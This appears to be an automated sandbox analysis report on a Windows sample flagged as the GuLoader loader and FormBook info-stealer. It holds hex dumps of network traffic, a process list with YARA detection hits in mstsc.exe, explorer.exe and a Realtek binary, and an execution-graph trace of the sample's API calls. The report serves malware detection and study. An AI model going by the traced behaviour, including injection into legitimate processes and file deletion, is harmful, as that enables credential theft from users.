                                                                                                                                                                                    2022-11-21 18:18:36 UTC179INData Raw: 84 a3 46 1a 2d 79 ac 5d cc 2e 69 3e f7 26 c7 16 d0 1e fa db d6 36 b8 ab 97 5c 06 be d6 73 5e 4a 08 a6 85 9c bf 3e 4f 1f 11 df 8f ff 4c d9 d7 fb c7 c9 0e 94 cd 34 c3 4e 2e 54 bb 60 d1 31 3f 60 fd 47 3f 7f 2d 41 c3 79 6b 4d 81 07 e2 0e 1f c4 30 b0 50 ac 61 2d 28 11 22 00 4d 36 87 88 dc 65 79 40 4e a4 ca 0f 45 1c bb 61 37 50 b1 c1 10 65 2a 7c 27 aa a1 a7 00 a6 f8 12 f4 00 5f 31 a7 61 90 d6 94 6a 2c a9 2f 2e 03 3a 87 dd b2 7b d2 cd 60 59 04 28 46 60 f4 bb 15 2e 28 e2 bc 4c b6 38 30 6e b8 79 30 9c 8a 45 ee b7 96 6c 38 c0 56 a4 45 ec 4c 83 78 b5 17 c3 35 16 f4 5d 38 62 3a d4 56 5b 6a e6 67 f9 4f c3 82 ff 57 6b 48 b0 75 83 fc 04 a6 91 90 e7 d7 63 de 77 72 e7 d3 76 f7 5e 2d 68 9d 71 0d 2a f1 b8 b3 a2 f0 29 40 4c 78 77 e9 c3 cd 66 7b df 06 40 46 8e 04 c8 84 7a e0
                                                                                                                                                                                    Data Ascii: F-y].i>&6\s^J>OL4N.T`1?`G?-AykM0Pa-("M6ey@NEa7Pe*|'_1aj,/.:{`Y(F`.(L80ny0El8VELx5]8b:V[jgOWkHucwrv^-hq*)@Lxwf{@Fz
                                                                                                                                                                                    2022-11-21 18:18:36 UTC180INData Raw: aa e6 18 d6 a3 c4 08 d0 ec 1f 1b dd 0e ca 24 0a 45 70 2e 10 0c b3 61 91 af e6 07 62 89 fa 10 c4 1b b9 20 e4 b1 67 d1 f4 ca 39 35 fb 8c 64 fa f8 bb 30 7d 51 45 00 06 9f 70 7d 38 ec 5c ec a2 5e c9 6d a9 b9 e9 a5 09 37 05 12 11 cd 35 a3 65 e1 63 96 6a 3d 12 d8 17 8d fd 3d 3c 26 0f 41 78 e6 65 ee b3 49 3f d9 ac 0f 4f 50 74 7a 45 87 f7 76 e6 5b 64 52 38 5c b7 4d ed 53 3c 13 7f c5 8e 4e 1d 83 45 41 b5 4a cc 8f 15 6a ff 33 32 d7 ed d1 10 5d 93 3d 79 9e bb bb 2e ac a6 9c 8b ab 4b 8f f4 1e 7f c3 45 23 90 72 da af c3 34 b9 a1 55 67 1e a5 02 20 30 f8 4e c0 16 b4 24 8f 52 f4 c4 aa 0d 34 47 19 64 1b 6a 8c 34 a6 09 27 75 c9 03 a5 2e 42 78 0c dd 77 ec be 5c c4 7c 2d bc 6d bd 23 a5 48 03 20 e2 07 45 d9 5b 66 65 95 7e a9 2f 24 ec 8e 22 76 46 7b bb 43 b5 6b b2 0f 32 f1 84
                                                                                                                                                                                    Data Ascii: $Ep.ab g95d0}QEp}8\^m75ecj==<&AxeI?OPtzEv[dR8\MS<NEAJj32]=y.KE#r4Ug 0N$R4Gdj4'u.Bxw\|-m#H E[fe~/$"vF{Ck2
                                                                                                                                                                                    2022-11-21 18:18:36 UTC181INData Raw: 9b 9b ce 1f 16 da 07 fe e6 3d 3c 6d 83 d7 28 28 c7 79 11 8f 8c 94 69 af 11 da 08 08 3f 0f 96 2a 95 ce 51 e7 75 47 f0 81 1e 92 4f 4f c7 f9 0f 11 3e bf f3 3a fd 7a 62 96 ea 57 a2 0e 28 f0 4a 46 a6 4c 76 a9 9a 20 e2 9f 0f dc 87 0e 81 e4 3c 2d 67 1b 68 ed 14 53 30 31 06 64 ca c2 41 ea 68 bc a6 b5 12 a0 3e f7 80 62 b7 ba cc bf 02 67 00 fa 9b fd 8c 85 b8 7d 4e 80 90 db 71 90 34 59 77 b3 8a c9 bf b1 1e 93 61 e9 22 ee 77 f8 e2 39 9a 59 fc 61 3c 62 03 05 78 5d 85 b3 8e d9 81 91 4e b1 b0 96 c2 d9 48 b3 60 bb 49 f3 33 2a 2d f7 3e e3 72 a8 f7 41 ca af be 30 d4 99 d7 4e a8 50 9b 0e bf ba c2 a8 9f 6d 93 94 88 45 16 fc d8 8a d2 65 dd e9 88 61 fa 4a c7 9d f9 b0 97 b6 ae 7e 2a 0a 48 d8 40 d8 74 e5 a8 f5 63 28 c9 cf ff c6 b5 c7 14 67 88 84 ae 3c ab b1 b4 18 4f 88 1a 9e 43
                                                                                                                                                                                    Data Ascii: =<m((yi?*QuGOO>:zbW(JFLv <-ghS01dAh>bg}Nq4Ywa"w9Ya<bx]NH`I3*->rA0NPmEeaJ~*H@tc(g<OC
                                                                                                                                                                                    2022-11-21 18:18:36 UTC182INData Raw: 8e c0 be 82 9c da f4 c6 b0 b8 b4 a0 4f 10 b5 f1 b7 4b 08 67 e8 a9 47 fa 1d 78 34 53 c1 b9 e7 97 7a 84 88 15 dc 37 5a 29 b4 57 6c 1d 25 a1 11 32 1b e9 34 e1 ea ab 5c c5 dd 44 18 79 34 60 cb 4e 2c 5c 17 cc 2a de ec 8b 00 d3 8b 30 3f 5a d6 a1 6f 6c b8 78 6e ab 77 2b 00 59 44 18 9a f1 5f cb c0 a9 c2 ca 5f 83 00 d2 9a bc d7 7b 89 2b c2 f2 93 49 72 83 a2 e3 80 e9 bd 1b 39 6c ba 28 d8 9f 6d 79 5d d7 20 44 d9 85 52 47 d2 c6 3d 87 3d ae 11 84 e8 b0 5a 99 65 6a 67 dc f9 37 03 e2 7a 88 ef 39 89 a3 c6 1d 9a d1 68 d3 23 f9 e2 af af 22 1d 64 30 5e b1 f1 fb 66 f9 ef 25 70 f5 76 5c fc 80 e7 82 c8 d2 de 1a 77 5f 4f 5f d6 ff e0 aa a5 fc 68 d6 05 57 e5 20 19 16 67 ea 48 da ed c6 dd c6 9b 60 63 03 67 f5 2a 26 ff 3e d3 fd 77 f5 d3 62 bb 29 57 2e ec d2 cc 83 f3 de cc f4 92 0e
                                                                                                                                                                                    Data Ascii: OKgGx4Sz7Z)Wl%24\Dy4`N,\*0?Zolxnw+YD__{+Ir9l(my] DRG==Zejg7z9h#"d0^f%pv\w_O_hW gH`cg*&>wb)W.
                                                                                                                                                                                    2022-11-21 18:18:36 UTC184INData Raw: f5 c7 6d 51 13 24 85 a6 b9 45 ed a7 82 8d a2 34 81 2a 82 24 78 b6 ac 23 53 56 9c 92 cb bf ce 69 ef 7e 05 85 98 13 0b a5 f8 60 d7 79 ca 54 76 7e 22 5e 24 24 31 64 ad 06 21 6d 75 93 a7 da c5 3f 07 67 0a ca d1 ef 48 44 11 6b 11 2e 10 ed 0d 06 89 20 b5 9d 3b a2 56 fb ab 92 5e a7 bb 6b d5 02 35 63 b2 fb 92 b4 8b d3 4f 68 28 20 48 29 24 08 0e 2e e4 e7 3f 3e 42 3c f0 1c ee c3 eb c0 87 3e 94 e3 95 d6 39 38 f2 6d ef 03 5e 8b cf 5a 43 a9 83 5c 9c 12 07 91 d3 8b 7f 8c 35 81 ea 1c d6 f7 6b 75 40 55 24 d8 75 db 2e 26 15 18 bd 43 7a 73 fe 78 0f 82 e9 13 11 24 18 2a 6c 45 dc 93 d2 88 5e 70 5d e5 53 2b da 48 04 bd 96 0c e0 e5 26 7d 7e 69 48 0a f8 28 f5 f5 e4 53 10 e9 37 55 ef 00 29 5f b4 8c 3e 83 b2 64 c1 1f 93 7a 44 a8 21 5b f5 1f 50 90 8e 02 db ea 0c f9 77 fe 45 68 f2
                                                                                                                                                                                    Data Ascii: mQ$E4*$x#SVi~`yTv~"^$$1d!mu?gHDk. ;V^k5cOh( H)$.?>B<>98m^ZC\5ku@U$u.&Czsx$*lE^p]S+H&}~iH(S7U)_>dzD![PwEh
                                                                                                                                                                                    2022-11-21 18:18:36 UTC185INData Raw: 79 c8 12 67 2f 26 75 38 7f 18 8d ac 96 7a bd 3a df c0 b5 e9 13 07 a5 49 c1 53 6e 81 7b 07 93 0b d8 18 1a 07 63 c2 80 1e db 83 44 0c 38 46 59 ce 7e c8 82 59 b4 d3 8d 49 88 d7 4b 08 96 d6 1c 1a 46 0e f8 39 b0 55 c6 08 d6 eb 09 8c d3 6e 17 c4 93 10 0f 1a cb 8a a0 15 b2 72 56 7d f3 5c 41 83 78 88 b3 58 3c 6a d3 29 7a 44 69 71 d2 f6 b0 5c 31 67 9d cb e7 fa c3 8a 3c 12 ff 2f 3a 36 f4 3f 49 f5 c5 0c 16 5b 2b 15 30 d8 45 16 ce de bd cd 86 10 15 92 97 16 63 6c 03 76 fa d5 79 09 3d 72 33 5a a5 1f a9 6e 15 97 09 b6 d4 05 8d b0 01 0b 88 8b 0f dd 9b 92 b0 51 c4 c5 fa 18 06 f0 af 0b c3 30 bc d4 69 bb 04 b0 39 8b b3 b8 0f b2 bd 66 2e 64 24 63 4a 82 c0 31 98 3f 46 be 57 9c 20 81 70 fd 81 ab 41 63 2f a0 8f 13 19 fc d4 92 93 ce 33 4b c4 20 f1 96 77 f0 39 4e e8 4b 06 69 64
                                                                                                                                                                                    Data Ascii: yg/&u8z:ISn{cD8FY~YIKF9UnrV}\AxX<j)zDiq\1g</:6?I[+0Eclvy=r3ZnQ0i9f.d$cJ1?FW pAc/3K w9NKid
                                                                                                                                                                                    2022-11-21 18:18:36 UTC186INData Raw: 40 07 89 41 85 20 9c 95 57 ab 15 0e d8 ba 2f 53 ff d6 99 a1 0e c8 21 07 56 c4 71 c1 87 c4 b8 93 3e 1f 84 de 21 7d 5f 13 2c 68 3e a5 40 e2 36 24 20 39 2a 97 be 5d 27 57 79 82 3c 86 6d 06 04 9a 1f 5c 8a c7 9e e1 0d c9 0a 0d 05 9e a3 7e 62 18 23 ff 61 20 7e 2c f4 c2 83 9b ca c5 bd 60 f6 91 c8 d5 c3 1e 2d 46 0a 87 a2 5e a9 6b 79 99 ff 22 96 d4 ab d2 a6 be ac a8 ff 75 fa dd 6d 91 a3 2b d7 43 e9 86 ff f1 a1 8e cf ad a9 ee 89 5a b0 8a 36 8a fd 70 4f f8 f0 2a dd d3 25 e9 a4 4a 16 a4 f8 16 c1 7f 72 09 2f ce 24 cc f3 b0 30 6a 2f 0a b4 19 c6 bb d9 d6 63 e8 6b 42 7f db 8b b8 1e bc b9 6d 9f 36 87 05 34 61 ff 4e 64 dc 76 a8 c3 a1 05 ab 2e 3e 1b 6f fa ea 7f 68 01 71 f8 d6 f7 8e 3e 20 0c ba fb 57 19 af 8a bf 0e a2 91 27 a9 ef 6d 20 3f f8 07 87 6f 4a 36 fd 4e ef 0e 4b 3d
                                                                                                                                                                                    Data Ascii: @A W/S!Vq>!}_,h>@6$ 9*]'Wy<m\~b#a ~,`-F^ky"um+CZ6pO*%Jr/$0j/ckBm64aNdv.>ohq> W'm ?oJ6NK=
                                                                                                                                                                                    2022-11-21 18:18:36 UTC187INData Raw: 0a a6 8b e8 b0 42 60 e7 d9 e5 48 d4 56 24 9f f3 31 4d dc 99 c8 55 19 4a 30 2d a4 01 78 9a e1 09 cd 98 f8 48 0c 40 a0 a4 9e b7 74 84 ce af 52 94 63 57 86 31 e3 8e 60 d4 05 3d a3 6d 7e d4 87 b7 b6 af 98 c0 f4 c3 3c 79 3b ac b3 89 19 22 3d fb c4 ac 11 89 c4 6c 45 c8 ee eb 91 22 79 3d f8 58 af a3 60 2d ff af f7 eb 6e d4 8e f2 1a 19 9f 1c 64 63 31 f2 cd a2 09 63 ba ae 8f ac c5 8a 86 80 87 b9 e4 72 23 1d 27 36 f6 f9 8c aa be a2 3d 36 1f 36 43 ee 24 3a 06 eb a9 90 dd 3e c6 ce df 65 02 97 05 a7 b2 ed 87 48 e9 b4 b5 cf 8f b1 82 d4 91 6a c6 ed 46 e8 21 04 27 96 0a 76 79 67 08 b1 12 93 ad 9c f6 76 4e 97 bb 78 0d ee cb dd 74 30 b1 aa 82 94 14 b4 b6 81 81 1c c0 67 66 0f f4 8c 18 3f 84 78 06 3d 82 b6 10 75 89 38 08 a6 00 6c 16 48 b0 27 38 44 53 10 6a cf 4a db ab 51 d7
                                                                                                                                                                                    Data Ascii: B`HV$1MUJ0-xH@tRcW1`=m~<y;"=lE"y=X`-ndc1cr#'6=66C$:>eHjF!'vygvNxt0gf?x=u8lH'8DSjJQ
                                                                                                                                                                                    2022-11-21 18:18:36 UTC188INData Raw: 0a 72 7a 87 66 ea f4 df d5 f4 cc bb 07 b1 47 41 5a 53 eb 57 ad 28 fa 2f 8b ac 18 27 97 c2 11 8e d5 21 46 75 70 cc 95 fc 88 ae de 1f 6d 53 73 92 b8 c1 bd 03 1a ea c7 52 44 b8 fa 26 c0 88 ba 13 99 a2 e7 83 ab 61 52 89 be 2a 78 76 73 8d 51 6e 29 e6 a7 28 ea 82 31 56 62 d3 bc a5 96 2b 42 b6 d9 0e 89 cc ad 6e 33 c9 d3 2f a0 c7 bc 69 08 95 74 74 6b b0 a7 ff 2f b3 3f 82 df 19 b6 dd e4 a4 89 fa 85 1b 80 61 e3 27 e8 04 85 67 b4 ec 1c 61 11 60 05 3f c4 e5 30 e5 7c 6f 06 b7 d6 f4 a0 7b 57 c7 39 dc 6f fe 7c 7e f3 de a9 99 83 10 b2 d1 00 0e 33 65 1f 02 88 0a 14 0a 37 c2 89 f2 39 dd 9d e7 f2 96 37 d1 8b 0c bc cf e8 74 68 1c f3 ad 8d 52 d0 e7 b1 b3 84 95 1d 7c 8e 9a e5 53 fc 81 c2 c9 3f 74 f1 54 6e a1 ef 62 98 97 e6 0e c9 f0 f9 cb 18 0c 16 a2 a2 fd cd 8b 6b dc 4a 6c 7c
                                                                                                                                                                                    Data Ascii: rzfGAZSW(/'!FupmSsRD&aR*xvsQn)(1Vb+Bn3/ittk/?a'ga`?0|o{W9o|~3e797thR|S?tTnbkJl|
                                                                                                                                                                                    2022-11-21 18:18:36 UTC190INData Raw: fd 17 90 63 73 1c 6b a6 c5 24 bd cf 0d d2 71 77 02 78 37 68 bb d5 91 4d d8 f3 9f 66 af 03 47 60 cf 36 04 2d 1d 8c d5 dc 17 2f 4f 75 db eb da cc 6c 1d a1 60 9b 6e 05 a7 b1 8d 4b 4c 9f b5 a0 0a 59 79 42 d7 39 b3 28 7b 69 89 0b e3 24 83 a7 93 1f b6 d5 a0 56 36 8c 3a 63 80 30 9c 3f 2b f2 df 8d e1 c6 8c 52 27 8f b8 7a 29 43 b6 62 2f 75 77 43 16 aa 30 3f 66 8b 0f 40 89 22 51 00 41 d7 2c 62 3f b5 49 48 ef bb 16 47 80 c4 26 f7 80 b5 55 59 f4 96 fd 8b 99 34 0d d6 cb 6d 5d 52 7f 1a 3c e1 66 a7 2c 66 75 22 fd f6 7b 33 97 39 14 a7 70 4a 28 47 d7 30 61 4d 00 29 dc ff 25 d4 03 08 f0 08 17 9b 19 d9 b2 38 58 45 ac ce fa 69 c4 82 f9 19 e2 93 ab ca 84 fb bf 52 b4 b1 ed f1 a9 a7 92 f9 ed 65 12 b5 da aa 74 43 be 23 86 eb 2e 75 fb 80 b8 9e d3 f9 46 56 8b ea 4d 57 06 d8 7c 9c
                                                                                                                                                                                    Data Ascii: csk$qwx7hMfG`6-/Oul`nKLYyB9({i$V6:c0?+R'z)Cb/uwC0?f@"QA,b?IHG&UY4m]R<f,fu"{39pJ(G0aM)%8XEiRetC#.uFVMW|


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:19:17:46
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:598249 bytes
                                                                                                                                                                                    MD5 hash:7CC14B0B7F4C470C20864D25BCC2DB3D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                    Start time:19:18:16
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\Aposporogony.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:598249 bytes
                                                                                                                                                                                    MD5 hash:7CC14B0B7F4C470C20864D25BCC2DB3D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.1828325700.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:19:18:49
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                    File size:16696840 bytes
                                                                                                                                                                                    MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:19:18:52
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\mstsc.exe
                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                    File size:1264640 bytes
                                                                                                                                                                                    MD5 hash:B038F39C887BE2A810E20B08613F3B84
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:19:19:06
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                    Imagebase:0x7ff714a60000
                                                                                                                                                                                    File size:4849904 bytes
                                                                                                                                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                    Start time:19:20:06
                                                                                                                                                                                    Start date:21/11/2022
                                                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                    Imagebase:0x7ff7f4f50000
                                                                                                                                                                                    File size:597432 bytes
                                                                                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:6.4%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:2.9%
                                                                                                                                                                                      Signature Coverage:20.8%
                                                                                                                                                                                      Total number of Nodes:1637
                                                                                                                                                                                      Total number of Limit Nodes:46
                                                                                                                                                                                      execution_graph 10747 401941 10748 401943 10747->10748 10753 402c41 10748->10753 10754 402c4d 10753->10754 10799 40640a 10754->10799 10757 401948 10759 405afa 10757->10759 10841 405dc5 10759->10841 10762 405b22 DeleteFileW 10764 401951 10762->10764 10763 405b39 10765 405c64 10763->10765 10855 4063e8 lstrcpynW 10763->10855 10765->10764 10884 40672b FindFirstFileW 10765->10884 10767 405b5f 10768 405b72 10767->10768 10769 405b65 lstrcatW 10767->10769 10856 405d09 lstrlenW 10768->10856 10770 405b78 10769->10770 10773 405b88 lstrcatW 10770->10773 10774 405b7e 10770->10774 10776 405b93 lstrlenW FindFirstFileW 10773->10776 10774->10773 10774->10776 10778 405c59 10776->10778 10780 405bb5 10776->10780 10777 405c82 10887 405cbd lstrlenW CharPrevW 10777->10887 10778->10765 10782 405c3c FindNextFileW 10780->10782 10791 405afa 60 API calls 10780->10791 10795 405450 24 API calls 10780->10795 10860 4063e8 lstrcpynW 10780->10860 10861 405ab2 10780->10861 10869 405450 10780->10869 10880 4061ae MoveFileExW 10780->10880 10782->10780 10786 405c52 FindClose 10782->10786 10783 405ab2 5 API calls 10785 405c94 10783->10785 10787 405cae 10785->10787 10790 405c98 10785->10790 10786->10778 10789 405450 24 API calls 10787->10789 10789->10764 10790->10764 10792 405450 24 API calls 10790->10792 10791->10780 10793 405ca5 10792->10793 10794 4061ae 36 API calls 10793->10794 10796 405cac 10794->10796 10795->10782 10796->10764 10803 406417 10799->10803 10800 406662 10801 402c6e 10800->10801 10832 4063e8 lstrcpynW 10800->10832 10801->10757 10816 40667c 10801->10816 10803->10800 10804 406630 lstrlenW 10803->10804 10805 40640a 10 API calls 10803->10805 10808 406545 GetSystemDirectoryW 10803->10808 10810 406558 GetWindowsDirectoryW 10803->10810 10811 40667c 5 API calls 10803->10811 10812 4065d3 lstrcatW 10803->10812 10813 40658c SHGetSpecialFolderLocation 10803->10813 10814 40640a 10 API calls 10803->10814 10825 4062b6 10803->10825 10830 40632f wsprintfW 10803->10830 10831 4063e8 lstrcpynW 10803->10831 10804->10803 10805->10804 10808->10803 10810->10803 10811->10803 10812->10803 10813->10803 10815 4065a4 SHGetPathFromIDListW CoTaskMemFree 10813->10815 10814->10803 10815->10803 10823 406689 10816->10823 10817 4066ff 10818 406704 CharPrevW 10817->10818 10820 406725 10817->10820 10818->10817 10819 4066f2 CharNextW 10819->10817 10819->10823 10820->10757 10822 4066de CharNextW 10822->10823 10823->10817 10823->10819 10823->10822 10824 4066ed CharNextW 10823->10824 10837 405cea 10823->10837 10824->10819 10833 406255 10825->10833 10828 40631a 10828->10803 10829 4062ea RegQueryValueExW RegCloseKey 10829->10828 10830->10803 10831->10803 10832->10801 10834 406264 10833->10834 10835 406268 10834->10835 10836 40626d RegOpenKeyExW 10834->10836 10835->10828 10835->10829 10836->10835 10838 405cf0 10837->10838 10839 405d06 10838->10839 10840 405cf7 CharNextW 10838->10840 10839->10823 10840->10838 10890 4063e8 lstrcpynW 10841->10890 10843 405dd6 10891 405d68 CharNextW CharNextW 10843->10891 10846 405b1a 10846->10762 10846->10763 10847 40667c 5 API calls 10853 405dec 10847->10853 10848 405e1d lstrlenW 10849 405e28 10848->10849 10848->10853 10850 405cbd 3 API calls 10849->10850 10852 405e2d GetFileAttributesW 10850->10852 10851 40672b 2 API calls 10851->10853 10852->10846 10853->10846 10853->10848 10853->10851 10854 405d09 2 API calls 10853->10854 10854->10848 10855->10767 10857 405d17 